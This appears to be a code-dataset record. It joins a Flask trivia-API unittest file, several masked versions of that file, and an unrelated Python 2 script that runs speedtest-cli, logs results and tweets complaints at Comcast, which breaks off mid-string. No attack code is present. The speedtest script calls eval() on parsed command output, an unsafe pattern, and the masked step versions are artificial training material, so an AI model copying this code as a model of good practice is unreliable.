self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'not found')
def test_get_questions_if_success(self):
res = self.client().get('/questions')
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['questions'])
self.assertTrue(data['total_questions'])
self.assertTrue(data['categories'])
self.assertIsNone(data['current_category'])
def test_get_questions_if_invalid_page(self):
res = self.client().get('/questions?page=10000')
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'not found')
def test_delete_question_if_success(self):
self.question_to_delete.insert()
res = self.client().delete(f'/questions/{self.question_to_delete.id}')
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertEqual(data['deleted_question'], self.question_to_delete.id)
self.assertTrue(data['questions'])
self.assertTrue(data['total_questions'])
def test_delete_questions_if_non_existing_book(self):
res = self.client().delete('/questions/100000')
data = json.loads(res.data)
self.assertEqual(res.status_code, 422)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'unprocessable')
def test_create_question_if_success(self):
res = self.client().post('/questions', json=self.new_question)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['created_question'])
def test_create_question_if_bad_endpoint(self):
res = self.client().post('/questions/45', json=self.new_question)
data = json.loads(res.data)
self.assertEqual(res.status_code, 405)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'method not allowed')
def test_search_questions_with_results(self):
res = self.client().post(
'/questions/search', json={'search': 'Van Gogh'}
)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['total_questions'])
self.assertEqual(len(data['questions']), 1)
def test_search_questions_without_results(self):
res = self.client().post(
'/questions/search', json={'search': 'Weird search'}
)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertEqual(data['total_questions'], 0)
self.assertEqual(len(data['questions']), 0)
def test_search_questions_failure(self):
res = self.client().post(
'/questions/search', json={'wrong_key': 'Van Gogh'}
)
data = json.loads(res.data)
self.assertEqual(res.status_code, 400)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'bad request')
def test_get_questions_by_category_if_success(self):
res = self.client().get('/categories/1/questions')
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['questions'])
self.assertTrue(data['total_questions'])
self.assertEqual(data['current_category'], 1)
def test_get_questions_by_category_if_failure(self):
res = self.client().get('/categories/10000/questions')
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'not found')
def test_get_quizz_question_if_success(self):
res = self.client().post('/quizzes', json=self.quizz)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['question'])
def test_get_quizz_question_if_bad_request(self):
res = self.client().post('/quizzes/4', json=self.quizz)
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'not found')
"""
TODO
Write at least one test for each test for successful
operation and for expected errors.
"""
# Make the tests conveniently executable
if __name__ == "__main__":
unittest.main()
|
normal
|
{
"blob_id": "364ac79e0f885c67f2fff57dfe3ddde63f0c269e",
"index": 995,
"step-1": "<mask token>\n\n\nclass TriviaTestCase(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_path = DB_PATH\n setup_db(self.app, self.database_path)\n self.question_to_delete = Question(question='What?', answer='huh!',\n category=1, difficulty=1)\n self.new_question = {'question': 'What?', 'answer': 'What',\n 'category': 1, 'difficulty': 1}\n self.quizz = {'previous_questions': [1, 3], 'quiz_category': {'id':\n 1, 'type': 'Science'}}\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n def test_get_categories_if_success(self):\n res = self.client().get('/categories')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['categories'])\n\n def test_get_categories_if_non_existing_category(self):\n res = self.client().get('/categories/10000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_questions_if_success(self):\n res = self.client().get('/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertTrue(data['categories'])\n self.assertIsNone(data['current_category'])\n\n def test_get_questions_if_invalid_page(self):\n res = self.client().get('/questions?page=10000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_delete_question_if_success(self):\n self.question_to_delete.insert()\n res = self.client().delete(f'/questions/{self.question_to_delete.id}')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['deleted_question'], self.question_to_delete.id)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n <mask token>\n\n def test_create_question_if_success(self):\n res = self.client().post('/questions', json=self.new_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['created_question'])\n\n def test_create_question_if_bad_endpoint(self):\n res = self.client().post('/questions/45', json=self.new_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 405)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'method not allowed')\n\n def test_search_questions_with_results(self):\n res = self.client().post('/questions/search', json={'search':\n 'Van Gogh'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['total_questions'])\n self.assertEqual(len(data['questions']), 1)\n\n def test_search_questions_without_results(self):\n res = self.client().post('/questions/search', json={'search':\n 'Weird search'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['total_questions'], 0)\n self.assertEqual(len(data['questions']), 0)\n <mask token>\n\n def test_get_questions_by_category_if_success(self):\n res = self.client().get('/categories/1/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertEqual(data['current_category'], 1)\n\n def test_get_questions_by_category_if_failure(self):\n res = self.client().get('/categories/10000/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n <mask token>\n\n def test_get_quizz_question_if_bad_request(self):\n res = self.client().post('/quizzes/4', json=self.quizz)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TriviaTestCase(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_path = DB_PATH\n setup_db(self.app, self.database_path)\n self.question_to_delete = Question(question='What?', answer='huh!',\n category=1, difficulty=1)\n self.new_question = {'question': 'What?', 'answer': 'What',\n 'category': 1, 'difficulty': 1}\n self.quizz = {'previous_questions': [1, 3], 'quiz_category': {'id':\n 1, 'type': 'Science'}}\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n def test_get_categories_if_success(self):\n res = self.client().get('/categories')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['categories'])\n\n def test_get_categories_if_non_existing_category(self):\n res = self.client().get('/categories/10000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_questions_if_success(self):\n res = self.client().get('/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertTrue(data['categories'])\n self.assertIsNone(data['current_category'])\n\n def test_get_questions_if_invalid_page(self):\n res = self.client().get('/questions?page=10000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_delete_question_if_success(self):\n self.question_to_delete.insert()\n res = self.client().delete(f'/questions/{self.question_to_delete.id}')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['deleted_question'], self.question_to_delete.id)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n <mask token>\n\n def test_create_question_if_success(self):\n res = self.client().post('/questions', json=self.new_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['created_question'])\n\n def test_create_question_if_bad_endpoint(self):\n res = self.client().post('/questions/45', json=self.new_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 405)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'method not allowed')\n\n def test_search_questions_with_results(self):\n res = self.client().post('/questions/search', json={'search':\n 'Van Gogh'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['total_questions'])\n self.assertEqual(len(data['questions']), 1)\n\n def test_search_questions_without_results(self):\n res = self.client().post('/questions/search', json={'search':\n 'Weird search'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['total_questions'], 0)\n self.assertEqual(len(data['questions']), 0)\n <mask token>\n\n def test_get_questions_by_category_if_success(self):\n res = self.client().get('/categories/1/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertEqual(data['current_category'], 1)\n\n def test_get_questions_by_category_if_failure(self):\n res = self.client().get('/categories/10000/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_quizz_question_if_success(self):\n res = self.client().post('/quizzes', json=self.quizz)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['question'])\n\n def test_get_quizz_question_if_bad_request(self):\n res = self.client().post('/quizzes/4', json=self.quizz)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TriviaTestCase(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_path = DB_PATH\n setup_db(self.app, self.database_path)\n self.question_to_delete = Question(question='What?', answer='huh!',\n category=1, difficulty=1)\n self.new_question = {'question': 'What?', 'answer': 'What',\n 'category': 1, 'difficulty': 1}\n self.quizz = {'previous_questions': [1, 3], 'quiz_category': {'id':\n 1, 'type': 'Science'}}\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n def test_get_categories_if_success(self):\n res = self.client().get('/categories')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['categories'])\n\n def test_get_categories_if_non_existing_category(self):\n res = self.client().get('/categories/10000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_questions_if_success(self):\n res = self.client().get('/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertTrue(data['categories'])\n self.assertIsNone(data['current_category'])\n\n def test_get_questions_if_invalid_page(self):\n res = self.client().get('/questions?page=10000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_delete_question_if_success(self):\n self.question_to_delete.insert()\n res = self.client().delete(f'/questions/{self.question_to_delete.id}')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['deleted_question'], self.question_to_delete.id)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n\n def test_delete_questions_if_non_existing_book(self):\n res = self.client().delete('/questions/100000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'unprocessable')\n\n def test_create_question_if_success(self):\n res = self.client().post('/questions', json=self.new_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['created_question'])\n\n def test_create_question_if_bad_endpoint(self):\n res = self.client().post('/questions/45', json=self.new_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 405)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'method not allowed')\n\n def test_search_questions_with_results(self):\n res = self.client().post('/questions/search', json={'search':\n 'Van Gogh'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['total_questions'])\n self.assertEqual(len(data['questions']), 1)\n\n def test_search_questions_without_results(self):\n res = self.client().post('/questions/search', json={'search':\n 'Weird search'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['total_questions'], 0)\n self.assertEqual(len(data['questions']), 0)\n\n def test_search_questions_failure(self):\n res = self.client().post('/questions/search', json={'wrong_key':\n 'Van Gogh'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 400)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'bad request')\n\n def test_get_questions_by_category_if_success(self):\n res = self.client().get('/categories/1/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertEqual(data['current_category'], 1)\n\n def test_get_questions_by_category_if_failure(self):\n res = self.client().get('/categories/10000/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_quizz_question_if_success(self):\n res = self.client().post('/quizzes', json=self.quizz)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['question'])\n\n def test_get_quizz_question_if_bad_request(self):\n res = self.client().post('/quizzes/4', json=self.quizz)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n <mask token>\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass TriviaTestCase(unittest.TestCase):\n \"\"\"This class represents the trivia test case\"\"\"\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_path = DB_PATH\n setup_db(self.app, self.database_path)\n self.question_to_delete = Question(question='What?', answer='huh!',\n category=1, difficulty=1)\n self.new_question = {'question': 'What?', 'answer': 'What',\n 'category': 1, 'difficulty': 1}\n self.quizz = {'previous_questions': [1, 3], 'quiz_category': {'id':\n 1, 'type': 'Science'}}\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n def test_get_categories_if_success(self):\n res = self.client().get('/categories')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['categories'])\n\n def test_get_categories_if_non_existing_category(self):\n res = self.client().get('/categories/10000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_questions_if_success(self):\n res = self.client().get('/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertTrue(data['categories'])\n self.assertIsNone(data['current_category'])\n\n def test_get_questions_if_invalid_page(self):\n res = self.client().get('/questions?page=10000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_delete_question_if_success(self):\n self.question_to_delete.insert()\n res = self.client().delete(f'/questions/{self.question_to_delete.id}')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['deleted_question'], self.question_to_delete.id)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n\n def test_delete_questions_if_non_existing_book(self):\n res = self.client().delete('/questions/100000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'unprocessable')\n\n def test_create_question_if_success(self):\n res = self.client().post('/questions', json=self.new_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['created_question'])\n\n def test_create_question_if_bad_endpoint(self):\n res = self.client().post('/questions/45', json=self.new_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 405)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'method not allowed')\n\n def test_search_questions_with_results(self):\n res = self.client().post('/questions/search', json={'search':\n 'Van Gogh'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['total_questions'])\n self.assertEqual(len(data['questions']), 1)\n\n def test_search_questions_without_results(self):\n res = self.client().post('/questions/search', json={'search':\n 'Weird search'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['total_questions'], 0)\n self.assertEqual(len(data['questions']), 0)\n\n def test_search_questions_failure(self):\n res = self.client().post('/questions/search', json={'wrong_key':\n 'Van Gogh'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 400)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'bad request')\n\n def test_get_questions_by_category_if_success(self):\n res = self.client().get('/categories/1/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertEqual(data['current_category'], 1)\n\n def test_get_questions_by_category_if_failure(self):\n res = self.client().get('/categories/10000/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_quizz_question_if_success(self):\n res = self.client().post('/quizzes', json=self.quizz)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['question'])\n\n def test_get_quizz_question_if_bad_request(self):\n res = self.client().post('/quizzes/4', json=self.quizz)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n \"\"\"\n TODO\n Write at least one test for each test for successful\n operation and for expected errors.\n \"\"\"\n\n\n<mask token>\n",
"step-5": "import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom flaskr import create_app\nfrom models import setup_db, Question\n\nDB_HOST = os.getenv('DB_HOST', '127.0.0.1:5432')\nDB_USER = os.getenv('DB_USER', 'postgres')\nDB_PASSWORD = os.getenv('DB_PASSWORD', 'postgres')\nDB_NAME = os.getenv('DB_NAME', 'trivia_test')\nDB_PATH = 'postgresql+psycopg2://{}:{}@{}/{}'.\\\n format(DB_USER, DB_PASSWORD, DB_HOST, DB_NAME)\n\n\nclass TriviaTestCase(unittest.TestCase):\n \"\"\"This class represents the trivia test case\"\"\"\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_path = DB_PATH\n setup_db(self.app, self.database_path)\n\n self.question_to_delete = Question(\n question='What?',\n answer='huh!',\n category=1,\n difficulty=1\n )\n\n self.new_question = {\n 'question': 'What?',\n 'answer': 'What',\n 'category': 1,\n 'difficulty': 1\n }\n\n self.quizz = {\n 'previous_questions': [1, 3],\n 'quiz_category': {'id': 1, 'type': 'Science'}\n }\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n def test_get_categories_if_success(self):\n res = self.client().get('/categories')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['categories'])\n\n def test_get_categories_if_non_existing_category(self):\n res = self.client().get('/categories/10000')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_questions_if_success(self):\n res = self.client().get('/questions')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertTrue(data['categories'])\n self.assertIsNone(data['current_category'])\n\n def test_get_questions_if_invalid_page(self):\n res = self.client().get('/questions?page=10000')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_delete_question_if_success(self):\n self.question_to_delete.insert()\n\n res = self.client().delete(f'/questions/{self.question_to_delete.id}')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['deleted_question'], self.question_to_delete.id)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n\n def test_delete_questions_if_non_existing_book(self):\n res = self.client().delete('/questions/100000')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'unprocessable')\n\n def test_create_question_if_success(self):\n res = self.client().post('/questions', json=self.new_question)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['created_question'])\n\n def test_create_question_if_bad_endpoint(self):\n res = self.client().post('/questions/45', json=self.new_question)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 405)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'method not allowed')\n\n def test_search_questions_with_results(self):\n res = self.client().post(\n '/questions/search', json={'search': 'Van Gogh'}\n )\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['total_questions'])\n self.assertEqual(len(data['questions']), 1)\n\n def test_search_questions_without_results(self):\n res = self.client().post(\n '/questions/search', json={'search': 'Weird search'}\n )\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['total_questions'], 0)\n self.assertEqual(len(data['questions']), 0)\n\n def test_search_questions_failure(self):\n res = self.client().post(\n '/questions/search', json={'wrong_key': 'Van Gogh'}\n )\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 400)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'bad request')\n\n def test_get_questions_by_category_if_success(self):\n res = self.client().get('/categories/1/questions')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['total_questions'])\n self.assertEqual(data['current_category'], 1)\n\n def test_get_questions_by_category_if_failure(self):\n res = self.client().get('/categories/10000/questions')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_quizz_question_if_success(self):\n res = self.client().post('/quizzes', json=self.quizz)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['question'])\n\n def test_get_quizz_question_if_bad_request(self):\n res = self.client().post('/quizzes/4', json=self.quizz)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'not found')\n\n \"\"\"\n TODO\n Write at least one test for each test for successful\n operation and for expected errors.\n \"\"\"\n\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n unittest.main()\n",
"step-ids": [
15,
16,
18,
19,
23
]
}
|
[
15,
16,
18,
19,
23
] |
##
## Originally created by https://www.reddit.com/user/AlekseyP
## Seen at: https://www.reddit.com/r/technology/comments/43fi39/i_set_up_my_raspberry_pi_to_automatically_tweet
##
#!/usr/bin/python
import os
import sys
import csv
import datetime
import time
import twitter
#Configuration
# Twitter
ACCESS_TOKEN=""
ACCESS_TOKEN_SECRET=""
CONSUMER_KEY=""
CONSUMER_SECRET=""
# Minimum network speed
min_net_speed = 10
# Speedtest client absolute path
speedtest_path = "/home/alberto/Desarrollo/Proyectos/Scripts/SpeedTest/speedtest-cli"
csv_output_file_path = "/home/alberto/Desarrollo/Proyectos/Scripts/SpeedTest/"
def test():
#run speedtest-cli
print 'running test'
a = os.popen("python %s --simple"%(speedtest_path)).read()
print 'ran'
#split the 3 line result (ping,down,up)
lines = a.split('\n')
print a
ts = time.time()
date =datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
#if speedtest could not connect set the speeds to 0
if "Cannot" in a:
p = 100
d = 0
u = 0
#extract the values for ping down and up values
else:
p = lines[0][6:11]
d = lines[1][10:14]
u = lines[2][8:12]
print date,p, d, u
#save the data to file for local network plotting
out_file = open(csv_output_file_path + 'data.csv', 'a')
writer = csv.writer(out_file)
writer.writerow((ts*1000,p,d,u))
out_file.close()
my_auth = twitter.OAuth(ACCESS_TOKEN,ACCESS_TOKEN_SECRET,CONSUMER_KEY,CONSUMER_SECRET)
twit = twitter.Twitter(auth=my_auth)
#try to tweet if speedtest couldnt even connet. Probably wont work if the internet is down
if "Cannot" in a:
try:
tweet="Hey @Comcast @ComcastCares why is my internet down? I pay for 150down\\10up in Washington DC? #comcastoutage #comcast"
## twit.statuses.update(status=tweet)
print tweet
except:
pass
# tweet if down speed is less than whatever I set
elif eval(d)<min_net_speed:
print "trying to tweet"
try:
# i know there must be a better way than to do (str(int(eval())))
tweet="Hey @Comcast why is my internet speed " + str(int(eval(d))) + "down\\" + str(int(eval(u))) + "up when I pay for 150down\\10up in Washington DC? @ComcastCares @xfinity #comcast #speedtest"
## twit.statuses.update(status=tweet)
print tweet
except Exception,e:
print str(e)
pass
return
if __name__ == '__main__':
test()
print 'completed'
|
normal
|
{
"blob_id": "6492f1eda79fd3116058f29647dc5f09e903f637",
"index": 7274,
"step-1": "##\n## Originally created by https://www.reddit.com/user/AlekseyP\n## Seen at: https://www.reddit.com/r/technology/comments/43fi39/i_set_up_my_raspberry_pi_to_automatically_tweet\n##\n\n#!/usr/bin/python\nimport os\nimport sys\nimport csv\nimport datetime\nimport time\nimport twitter\n\n#Configuration\n# Twitter\nACCESS_TOKEN=\"\"\nACCESS_TOKEN_SECRET=\"\"\nCONSUMER_KEY=\"\"\nCONSUMER_SECRET=\"\"\n# Minimum network speed\nmin_net_speed = 10\n# Speedtest client absolute path\nspeedtest_path = \"/home/alberto/Desarrollo/Proyectos/Scripts/SpeedTest/speedtest-cli\"\ncsv_output_file_path = \"/home/alberto/Desarrollo/Proyectos/Scripts/SpeedTest/\"\n\ndef test():\n\n #run speedtest-cli\n print 'running test'\n a = os.popen(\"python %s --simple\"%(speedtest_path)).read()\n print 'ran'\n #split the 3 line result (ping,down,up)\n lines = a.split('\\n')\n print a\n ts = time.time()\n date =datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n #if speedtest could not connect set the speeds to 0\n if \"Cannot\" in a:\n p = 100\n d = 0\n u = 0\n #extract the values for ping down and up values\n else:\n p = lines[0][6:11]\n d = lines[1][10:14]\n u = lines[2][8:12]\n print date,p, d, u\n #save the data to file for local network plotting\n out_file = open(csv_output_file_path + 'data.csv', 'a')\n writer = csv.writer(out_file)\n writer.writerow((ts*1000,p,d,u))\n out_file.close()\n\n my_auth = twitter.OAuth(ACCESS_TOKEN,ACCESS_TOKEN_SECRET,CONSUMER_KEY,CONSUMER_SECRET)\n twit = twitter.Twitter(auth=my_auth)\n\n #try to tweet if speedtest couldnt even connet. Probably wont work if the internet is down\n if \"Cannot\" in a:\n try:\n tweet=\"Hey @Comcast @ComcastCares why is my internet down? I pay for 150down\\\\10up in Washington DC? #comcastoutage #comcast\"\n ## 